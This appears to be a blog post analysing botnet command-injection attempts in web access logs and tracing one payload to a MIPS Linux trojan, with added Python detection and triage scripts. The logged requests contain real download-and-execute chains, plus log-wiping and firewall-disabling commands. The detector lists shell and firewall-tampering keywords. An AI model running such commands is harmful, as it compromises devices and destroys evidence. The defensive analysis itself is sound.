1.55.6.214 - - [29/Jun/2019:12:44:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://103.83.157.41/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
151.72.192.183 - - [29/Jun/2019:13:04:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "ELEMENT/2.0"
37.6.220.254 - - [29/Jun/2019:17:38:04 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://157.230.173.232/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "DEMONS/2.0"
79.45.31.73 - - [29/Jun/2019:19:01:27 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "ELEMENT/2.0"
151.66.2.254 - - [29/Jun/2019:19:16:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://68.183.88.126/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "Tron/2.0"
Except for the first one, which also shuts down the firewall after downloading its payload, all of the others simply download a file and then set its execute permission.
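For a defender, the useful output from these entries is a per-line verdict: is the `cli=` parameter carrying a shell command chain, does the User-Agent itself carry commands, and is there firewall tampering? The following detector is an added example written for this post, not code from the original; the log lines it runs on are constructed to mirror the entries above (documentation-range IPs, placeholder payload hosts), and the indicator lists are assumptions chosen to match the observed traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the post's access-log entries.
# Source IPs are from documentation ranges and the payload hosts are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [29/Jun/2019:12:44:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://198.51.100.5/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0;rm -rf /tmp/*;service iptables stop;/sbin/iptables -F;service firewalld stop;"
192.0.2.11 - - [29/Jun/2019:13:04:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://198.51.100.6/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "ELEMENT/2.0"
192.0.2.12 - - [29/Jun/2019:13:05:00 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Apache/nginx "combined" log format: ip ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Assumed indicators: commands that appear in download-and-execute chains,
# and commands that disable host firewalling (seen in the first entry's UA).
SHELL_VERB_RE = re.compile(r"\b(?:wget|curl|tftp|chmod|sh|rm|iptables|pkill|busybox)\b")
FIREWALL_TAMPER = ("iptables -F", "iptables -X", "service iptables stop", "service firewalld stop")
URL_RE = re.compile(r"https?://[^\s;'\"]+")


def analyze_line(line):
    """Return a dict describing one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(m["target"])  # %27 -> ', %20 -> space, %3E -> >
    ua = m["ua"]
    findings = []
    # A shell separator plus a command verb inside a query string is injection, not a login.
    if ";" in decoded and SHELL_VERB_RE.search(decoded):
        findings.append("command_injection_in_query")
    # Some bots abuse the User-Agent as a second command channel.
    if ";" in ua and SHELL_VERB_RE.search(ua):
        findings.append("shell_commands_in_user_agent")
    if any(f in ua or f in decoded for f in FIREWALL_TAMPER):
        findings.append("firewall_tampering")
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "status": int(m["status"]),
        "findings": findings,
        # Payload URLs are the pivot for blocking and for fetching the dropper safely.
        "payload_urls": URL_RE.findall(decoded),
    }


def scan_log(text):
    """Return only the parsed lines that raised at least one finding."""
    results = (analyze_line(l) for l in text.splitlines() if l.strip())
    return [r for r in results if r and r["findings"]]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["ts"], hit["findings"], hit["payload_urls"])
```

Feeding a real access log through `scan_log` yields the source IPs, the payload download URLs and a flag for the firewall-disabling variant, which is exactly the split the sentence above makes by eye.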
Picking one of the download links at random, the result is a shell script that in turn downloads a file named element.mips, and it appears to be aimed at D-Link devices?
Opening the downloaded element.mips file shows mostly garbled bytes, but there are a few interesting sections inside: it turns out to be a compressed archive that can be unpacked.
Unpacking element.mips yields a pile of files whose purpose is unknown.
Uploading element.mips to VirusTotal for analysis: yes, it is a trojan targeting Linux systems.
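The steps above (look at the raw bytes, notice an embedded archive, unpack it, hash it for VirusTotal) can be done without opening the file in an editor. The triage script below is an added example for this post and is not the author's tooling: it scans a blob for well-known magic bytes at any offset, reads the ELF identification fields to confirm the architecture, carves out an embedded gzip stream, and computes the SHA-256 to look up. The blob it runs on is constructed here (a minimal big-endian MIPS ELF header followed by filler and a gzip member); nothing about the real element.mips beyond what the post states is assumed.

```python
import gzip
import hashlib
import struct
import zlib

# Magic bytes to search for anywhere in the blob, not only at offset 0.
SIGNATURES = {
    b"\x7fELF": "ELF executable",
    b"\x1f\x8b\x08": "gzip stream",
    b"PK\x03\x04": "zip archive",
    b"BZh": "bzip2 stream",
    b"\xfd7zXZ\x00": "xz stream",
    b"UPX!": "UPX packer marker",
}

# e_machine values from the ELF specification (subset).
ELF_MACHINES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def find_signatures(blob):
    """Return (offset, description) for every signature occurrence, sorted by offset."""
    hits = []
    for magic, name in SIGNATURES.items():
        start = 0
        while (pos := blob.find(magic, start)) != -1:
            hits.append((pos, name))
            start = pos + 1
    return sorted(hits)


def elf_header_info(blob, offset=0):
    """Parse e_ident (class, byte order) and e_type/e_machine of an ELF header."""
    ident = blob[offset:offset + 16]
    if ident[:4] != b"\x7fELF":
        raise ValueError("no ELF magic at offset %d" % offset)
    endian = "<" if ident[5] == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", blob[offset + 16:offset + 20])
    return {
        "class": "ELF32" if ident[4] == 1 else "ELF64",
        "endian": "little" if ident[5] == 1 else "big",
        "type": e_type,
        "machine": ELF_MACHINES.get(e_machine, "unknown(%d)" % e_machine),
    }


def carve_gzip(blob, offset):
    """Decompress the gzip member at offset; trailing non-gzip bytes are ignored."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)
    return d.decompress(blob[offset:])


def sha256_hex(blob):
    """Hash to submit to a reputation service instead of uploading the sample."""
    return hashlib.sha256(blob).hexdigest()


def build_sample_blob():
    """Constructed stand-in for a packed MIPS binary with an embedded gzip member."""
    e_ident = b"\x7fELF" + bytes([1, 2, 1, 0]) + b"\x00" * 8  # ELF32, big-endian, SysV ABI
    header = e_ident + struct.pack(">HH", 2, 8)                 # ET_EXEC, EM_MIPS
    inner = gzip.compress(b"#!/bin/sh\n# constructed placeholder dropper script\n", mtime=0)
    return header + b"\x00" * 40 + b"UPX!" + b"\xaa" * 16 + inner + b"\xbb" * 8


def triage(blob):
    """Produce a small triage report: hash, signatures found, ELF fields, carved gzip data."""
    sigs = find_signatures(blob)
    report = {"sha256": sha256_hex(blob), "signatures": sigs, "elf": None, "carved": []}
    if blob[:4] == b"\x7fELF":
        report["elf"] = elf_header_info(blob)
    for pos, name in sigs:
        if name == "gzip stream":
            try:
                report["carved"].append((pos, carve_gzip(blob, pos)))
            except zlib.error:
                pass  # a false-positive magic match, not a real member
    return report


if __name__ == "__main__":
    r = triage(build_sample_blob())
    print("sha256:", r["sha256"])
    print("elf:", r["elf"])
    for pos, name in r["signatures"]:
        print("0x%06x %s" % (pos, name))
    for pos, data in r["carved"]:
        print("carved gzip at 0x%06x -> %r" % (pos, data[:40]))
```

Run it on the real file with `triage(open("element.mips", "rb").read())`: the ELF fields confirm the MIPS target the filename suggests, the signature offsets show where the embedded archive starts, and the hash can be checked against VirusTotal before the sample is ever uploaded.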